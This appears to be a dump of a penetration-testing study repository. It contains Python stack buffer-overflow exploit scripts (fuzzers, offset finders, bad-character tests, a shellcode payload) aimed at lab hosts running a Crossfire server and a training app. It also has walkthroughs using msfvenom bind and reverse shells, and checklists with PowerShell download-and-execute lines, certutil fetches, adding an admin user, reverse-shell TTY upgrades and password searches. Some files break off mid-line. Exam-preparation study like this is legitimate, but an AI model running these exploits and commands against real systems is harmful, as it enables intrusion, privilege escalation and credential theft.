'B'*4 7 | pre_buff="\x11(setup sound " 8 | 9 | post_buff = "x90\x00#" 10 | 11 | try: 12 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 13 | s.connect(('192.168.0.131',13327)) 14 | print ("Sending payload to remote server..........") 15 | s.send((pre_buff + offset + post_buff)) 16 | s.close() 17 | print("Payload send......") 18 | 19 | except: 20 | print("Error in connecting remote server........!") 21 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/crossfire/fuzz.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | from time import sleep 3 | 4 | buffer ="A" * 100 5 | pre_buff="\x11(setup sound " 6 | 7 | post_buff = "x90\x00#" 8 | 9 | while True: 10 | try: 11 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 12 | s.connect(('192.168.0.131',13327)) 13 | print "Trying with buffer length %d" % len(buffer) 14 | s.send((pre_buff + buffer + post_buff)) 15 | s.close() 16 | sleep(1) 17 | buffer=buffer + "A"*100 18 | 19 | 20 | except: 21 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 22 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/crossfire/offset.py: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | import sys, socket 3 | 4 | 5 | 6 | offset='A' * 4368 + 'B' * 4 7 | pre_buff="\x11(setup sound " 8 | 9 | post_buff = "x90\x00#" 10 | 11 | try: 12 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 13 | s.connect(('192.168.0.131',13327)) 14 | print ("Sending payload to remote server..........") 15 | s.send((pre_buff + offset + post_buff)) 16 | s.close() 17 | print("Payload send......") 18 | 19 | except: 20 | print("Error in connecting remote server........!") 21 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/crossfire/walk: -------------------------------------------------------------------------------- 1 | "Cross fire" 2 | 3 | 4 | IP 192.168.0.131 5 | 6 | 13327/tcp open crossfire Crossfire game server 1.9.0 or earlier 7 | 8 | 9 | 1 finding ser ver crash and offset for buffer 10 | 11 | crash at 4800 12 | offset => 4377 13 | 14 | 2. 15 | -------------------------------------------------------------------------------- /BufferOverflow/dostackbufferoverflowgood/Bad_char.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | import socket 3 | 4 | RHOST = "192.168.0.134" 5 | RPORT = 31337 6 | 7 | buf_totlen=1024 8 | esp=146 9 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 10 | s.connect((RHOST, RPORT)) 11 | 12 | 13 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 14 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 15 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 16 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 17 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 18 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 19 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 20 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 21 | 22 | 23 | buf = "" 24 | buf += "A"*( esp- len(buf)) #padding 25 | buf += "BBBB" #SRP Overwrite 26 | buf += "CCCC" #ESP pointer 27 | buf += badchars #trailing 28 | buf += "\n" 29 | 30 | try: 31 | print"Sending Paylaod to remote server....." 32 | s.send('USER test\r\n') 33 | s.recv(1024) 34 | s.send(buf) 35 | s.send('QUIT\r\n') 36 | s.close() 37 | 38 | except: 39 | print"Failed to connect/....." -------------------------------------------------------------------------------- /BufferOverflow/dostackbufferoverflowgood/EIP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | import socket 3 | 4 | RHOST = "192.168.0.134" 5 | RPORT = 31337 6 | 7 | buf_totlen=1024 8 | esp=146 9 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 10 | s.connect((RHOST, RPORT)) 11 | 12 | buf = "" 13 | buf += "A"*( esp- len(buf)) #padding 14 | buf += "BBBB" #SRP Overwrite 15 | buf += "CCCC" 16 | #buf += "\xCC\xCC\xCC\xCC" #ESP pointer 17 | buf += "D"*(buf_totlen - len(buf)) #trailing 18 | buf += "\n" 19 | 20 | try: 21 | print"Sending Paylaod to remote server....." 22 | s.send('USER test\r\n') 23 | s.recv(1024) 24 | s.send(buf) 25 | s.send('QUIT\r\n') 26 | s.close() 27 | 28 | except: 29 | print"Failed to connect/....." -------------------------------------------------------------------------------- /BufferOverflow/dostackbufferoverflowgood/Fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys,socket 3 | 4 | # Create an array of buffers from 10 to 2000 with increments of 20. 5 | buffe="" 6 | buffe+="A" * 1100 7 | buffe+="\n" 8 | 9 | 10 | try: 11 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 12 | s.connect(('192.168.0.134',31337)) 13 | print "Trying with buffer length %d" % len(buffe) 14 | s.send((buffe)) 15 | s.recv(1024) 16 | s.close() 17 | 18 | #buffe=buffe + "A"*100 19 | 20 | 21 | except: 22 | print("Fuzzing Crashed at %s by" % str(len(buffe))) 23 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/dostackbufferoverflowgood/Pattern.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | import socket 3 | 4 | RHOST = "192.168.0.134" 5 | RPORT = 31337 6 | 7 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | s.connect((RHOST, RPORT)) 9 | 10 | buf = "" 11 | buf += ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk") 12 | buf += "\n" 13 | 14 | try: 15 | print"Sending Paylaod to remote server....." 16 | s.send('USER test\r\n') #send junk as username 17 | s.recv(1024) 18 | s.send(buf) 19 | s.send('QUIT\r\n') 20 | s.close() 21 | 22 | except: 23 | print"Failed to connect/....." -------------------------------------------------------------------------------- /BufferOverflow/dostackbufferoverflowgood/Shellcode.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import struct 3 | 4 | RHOST = "192.168.0.134" 5 | RPORT = 31337 6 | 7 | buf_totlen=1024 8 | esp=146 9 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 10 | s.connect((RHOST, RPORT)) 11 | 12 | 13 | Shellcode=("\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e" 14 | "\xfa\x33\xee\x92\x83\xee\xfc\xe2\xf4\x06\xdb\x6c\x92\xfa\x33" 15 | "\x8e\x1b\x1f\x02\x2e\xf6\x71\x63\xde\x19\xa8\x3f\x65\xc0\xee" 16 | "\xb8\x9c\xba\xf5\x84\xa4\xb4\xcb\xcc\x42\xae\x9b\x4f\xec\xbe" 17 | "\xda\xf2\x21\x9f\xfb\xf4\x0c\x60\xa8\x64\x65\xc0\xea\xb8\xa4" 18 | "\xae\x71\x7f\xff\xea\x19\x7b\xef\x43\xab\xb8\xb7\xb2\xfb\xe0" 19 | "\x65\xdb\xe2\xd0\xd4\xdb\x71\x07\x65\x93\x2c\x02\x11\x3e\x3b" 20 | "\xfc\xe3\x93\x3d\x0b\x0e\xe7\x0c\x30\x93\x6a\xc1\x4e\xca\xe7" 21 | "\x1e\x6b\x65\xca\xde\x32\x3d\xf4\x71\x3f\xa5\x19\xa2\x2f\xef" 22 | "\x41\x71\x37\x65\x93\x2a\xba\xaa\xb6\xde\x68\xb5\xf3\xa3\x69" 23 | "\xbf\x6d\x1a\x6c\xb1\xc8\x71\x21\x05\x1f\xa7\x5b\xdd\xa0\xfa" 24 | "\x33\x86\xe5\x89\x01\xb1\xc6\x92\x7f\x99\xb4\xfd\xcc\x3b\x2a" 25 | "\x6a\x32\xee\x92\xd3\xf7\xba\xc2\x92\x1a\x6e\xf9\xfa\xcc\x3b" 26 | "\xc2\xaa\x63\xbe\xd2\xaa\x73\xbe\xfa\x10\x3c\x31\x72\x05\xe6" 27 | "\x79\xf8\xff\x5b\x2e\x3a\xfa\xb4\x86\x90\xfa\x37\x3c\x1b\x1c" 28 | "\x59\xfe\xc4\xad\x5b\x77\x37\x8e\x52\x11\x47\x7f\xf3\x9a\x9e" 29 | "\x05\x7d\xe6\xe7\x16\x5b\x1e\x27\x58\x65\x11\x47\x92\x50\x83" 30 | "\xf6\xfa\xba\x0d\xc5\xad\x64\xdf\x64\x90\x21\xb7\xc4\x18\xce" 31 | "\x88\x55\xbe\x17\xd2\x93\xfb\xbe\xaa\xb6\xea\xf5\xee\xd6\xae" 32 | "\x63\xb8\xc4\xac\x75\xb8\xdc\xac\x65\xbd\xc4\x92\x4a\x22\xad" 33 | "\x7c\xcc\x3b\x1b\x1a\x7d\xb8\xd4\x05\x03\x86\x9a\x7d\x2e\x8e" 34 | "\x6d\x2f\x88\x0e\x8f\xd0\x39\x86\x34\x6f\x8e\x73\x6d\x2f\x0f" 35 | "\xe8\xee\xf0\xb3\x15\x72\x8f\x36\x55\xd5\xe9\x41\x81\xf8\xfa" 36 | "\x60\x11\x47") 37 | 38 | jmp_esp=struct.pack(" \xc3\x14\x04\08 19 | 0x080416BF =>\xbf\x16\x04\x08 20 | 21 | 6. sendpaylaod 22 | jmp_esp=struct.pack(" 43366843 14 | 4. Offset finding =>1788 15 | 5. Check offset and data to control EIP"A"* 1788 + "B" * 4 + "C" * 300 16 | 6. Bad cahracter finding (\x00\x0d) 17 | 7. Find JMP ESP (!mona find -s "\xff\xe4" -m user32.dll) 18 | 8. 75FB94E3 FFE4 JMP ESP ==> \xe3\x94\xfb\x75 19 | 9. making bind shell (msfvenom -p windows/shell_bind_tcp -f c -b "\x00\x0d") 20 | 10. send final exploit 21 | 11 taking shell -------------------------------------------------------------------------------- /CTF_template.ctb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mrnmap/OSCP2020/f1cca5e58d298e56564cd87715b0469ab2eb5e73/CTF_template.ctb -------------------------------------------------------------------------------- /Checklist/File_trr: -------------------------------------------------------------------------------- 1 | 2 | Server 3 | { 4 | # HTTP - Apache2 5 | # cp file /var/www/html/file_name 6 | sudo service apache2 start 7 | 8 | # HTTP - Python. Default port 8000 9 | # python2 10 | sudo python -m SimpleHTTPServer 80 11 | # python3 12 | sudo python3 -m http.server 80 13 | 14 | # SMB 15 | sudo impacket-smbserver 16 | 17 | # FTP 18 | # apt-get install python-pyftpdlib 19 | sudo python -m pyftpdlib -p 21 20 | 21 | # TFTP (UDP) 22 | sudo atftpd --daemon -port 69 /path/to/serve 23 | 24 | # Netcat 25 | nc -nvlp < file/to/send 26 | } 27 | 28 | Linux - HTTP 29 | 30 | { 31 | # Wget 32 | wget http:///file_name -O /path/to/save/file 33 | 34 | # Netcat 35 | nc -nv > file/to/recv 36 | 37 | # cURL 38 | curl http:///file_name --output file_name 39 | 40 | } 41 | 42 | Windows 43 | { 44 | HTTP 45 | # Does not save file on the system 46 | powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http:///')" 47 | # Saves file on the system 48 | powershell.exe -nop -ep bypass -c "iwr -uri http:/// -outfile path/to/save/file_name" 49 | powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadFile('http:///','path/to/save/file_name')" 50 | certutil.exe -urlcache -split -f http:///file file_save 51 | } 52 | 53 | Wget.ps1 54 | { 55 | echo $storageDir = $pwd >> wget.ps1 56 | $webclient = New-Object System.Net.WebClient >> wget.ps1 57 | # Download file from 58 | $url = "http:///file_name" >> wget.ps1 59 | # Save file as 60 | $file = "file_name" 61 | echo $webclient.DownloadFile($url,$file) >>wget.ps1 62 | # execute the script as follows 63 | powershell.exe -nop -ep bypass -nol -noni -f wget.ps1 64 | } 65 | 66 | TFTP (UDP) 67 | { 68 | tftp -i get file_name 69 | } 70 | 71 | SMB 72 | { 73 | # cmd.exe 74 | net use Z: \\\share_name 75 | # To access the drive 76 | Z: 77 | # PowerShell 78 | New-PSDrive -Name "notmalicious" -PSProvider "FileSystem" -Root "\\attacker_ip\share_name" 79 | # To access the drive 80 | notmalicious: 81 | } 82 | 83 | FTP 84 | { 85 | ftp 86 | ftp>binary 87 | ftp>get file_name 88 | 89 | # One-liner downloader 90 | # in cmd.exe do not use quotes in an echo command 91 | echo open >> download.txt 92 | echo anonymous >> download.txt 93 | echo anon >> download.txt 94 | echo binary >> download.txt 95 | get file_name >> download.txt 96 | bye >> download.txt 97 | } 98 | ftp -s:download.txt -------------------------------------------------------------------------------- /Checklist/Port_forwarding: -------------------------------------------------------------------------------- 1 | Port Forwarding 2 | 3 | 4 | Remote Port 5 | 6 | { 7 | #ssh -R 7000:127.0.0.1:8000 user@example.com 8 | 9 | cat /etc/ssh/sshd_config 10 | enable PermitRootLogin yes 11 | service ssh restart 12 | .\plink.exe root@ip -R 445:127.0.0.1:445 13 | 14 | plink .exe uname@ip -R rpot:127.0.0.1 :port 15 | } 16 | 17 | # Web 18 | Always check the source code with Ctrl+U 19 | 20 | # Entry point 21 | Enumerate everything, including enumerating what you just enumerated 22 | 23 | # Exploits 24 | Search for publicly available exploits or PoC to make sure no unnecessary shit is happening when exploiting it 25 | 26 | # Enumeration 27 | If the web application redirects everything back into it's main page, try enumerating it with Burp Suite built-in Spider tool 28 | 29 | # Bypassing User-Agent Blacklist 30 | Some application will not respond to common directory enumeration tool(Gobuster/Dirb) because it blocks the tool by checking the User Agent. 31 | To bypass this, simply run the tool with a custom User Agent with it. 32 | dirb http://10.10.10.58:3000 33 | WARNING: NOT_FOUND[] page not stable, unable to determine the correct URLs {200}. 34 | dirb http://10.10.10.58:3000 -a Custom User Agent -------------------------------------------------------------------------------- /Checklist/TTY: -------------------------------------------------------------------------------- 1 | 2 | 1. python -c 'import pty; pty.spawn("/bin/bash")' 3 | python -c "import pty; pty.spawn('/bin/bash')" 4 | 5 | 2. socat 6 | { 7 | kali => socat file:`tty`,raw,echo=0 tcp-listen:4444 8 | virtim=> socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 9 | 10 | } 11 | 3. in revershell Ctrl+z 12 | stty raw -echo 13 | fg 14 | 15 | export TERM=xterm 16 | 17 | export SHELL=bash 18 | $ export TERM=xterm256-color 19 | $ stty rows 38 columns 116 20 | 21 | 22 | 23 | 24 | 25 | https://www.youtube.com/watch?v=-f-XFAVMDQ8&list=PLqM63j87R5p4Mp4NP-Oa1kLV6o22RDfex 26 | 27 | https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f 28 | 29 | SC -------------------------------------------------------------------------------- /Checklist/WinPriEsc_Checklist: -------------------------------------------------------------------------------- 1 | Privlage Esclation WIndows 2 | 3 | Script 4 | { 5 | 6 | 7 | } 8 | 9 | 10 | # basic Commnad 11 | 12 | 1. hostname =>(find hostname of system) 13 | 2. whoami / priv =>(find currently logined user)\ 14 | 3. systeminfo =>(compelete systeminfo) 15 | 4. Uer operation{ 16 | net users =>(user of machine) 17 | 18 | net localgroups => localgroups 19 | 20 | net user uname => detaield about user 21 | 22 | net user uname pwd /add => add user 23 | 24 | net localgroup administrators hacker/add => make admin 25 | 26 | 27 | 28 | 29 | } 30 | 31 | 7. net group /domain => VIew domain groups 32 | 8. netsh firewall show state / config => firewall setting 33 | 9. route print => network operation route 34 | 10.arp -a => arp entry 35 | 11. netstat -ano => internal port and services 36 | 12. echo %path% => print path variable entry 37 | 38 | 39 | 40 | 13. wmic qfe get Caption,Description,HotFixID,InstalledOn => how well system is pactehd 41 | 42 | 14. chtasks /query /fo LIST /v => display verbose output for all scheduled tasks 43 | 44 | 15. asklist /SVC => links running processes to started services. 45 | 46 | 16. net start => service to start 47 | 48 | 17. DRIVERQUERY => list of installed 3rd party driver 49 | 50 | 51 | 52 | 18 The command below will search the file system for file names containing certain keywords. You can 53 | specify as many keywords as you wish. 54 | 55 | dir /s *pass* == *cred* == *vnc* == *.config* 56 | 57 | findstr /si password *.xml *.ini *.txt 58 | 59 | 19 Similarly the two commands below can be used to grep the registry for keywords, in this case "password". 60 | 61 | reg query HKLM /f password /t REG_SZ /s 62 | reg query HKCU /f password /t REG_SZ /s 63 | 64 | 65 | 66 | 67 | 68 | -------------------------------------------------------------------------------- /Checklist/buffer overflow checklist: -------------------------------------------------------------------------------- 1 | 1. Find Victium IP and port {verify by nc -nv ip port} 2 | 3 | 2. Add IP and port to fuzzing script + check any additional parameter 4 | 5 | 3. Use Fuzzing script to find crash point 6 | 7 | 4. Chewck EIp overwirte by payloads 8 | 9 | 10 | 5. generate uniquee patter of crash size via scriot 11 | 12 | (/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l size) 13 | 14 | 6. add patter in script and Send patternt and check for crash 15 | 16 | 7. note the value of EIP and calculate offset via 17 | (/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l size -q eip_value) 18 | 19 | 8. Display all modules .dll via mona 20 | 21 | (!mona modules) 22 | 23 | 9. Finding JMP ESP on {user32.sll || Shell32.dll} 24 | 25 | (!mona find -s "\xff\xe4" -m shell32.dll) 26 | 27 | 10. note the vlaue of regioster 28 | 29 | 11. put JMPESP reg_add in "EIP" and check if EIP is controlled 30 | 31 | 12. Send bad char and Find bad characters {\x00\x} resned again and find all bad character 32 | 33 | 13 Add padding before shellcode ("\x90" * 10) and finalize buffer {eg => Shellcode="A" * 2003 + "\xaf\x11\x50\x62" + "\x90" *32 +exploit 34 | } 35 | 36 | 14. Make shell code via 37 | (msfvenom -p windows/shell_reverse_tcp LHOS=ip LPORT=1234 EXITFUNC=thread -f c -b "\x00") 38 | 39 | 16. Send final payload and get reverse shell 40 | 41 | 42 | 43 | 17 Convet JMP ESP to little India 44 | 45 | jmp_esp=struct.pack('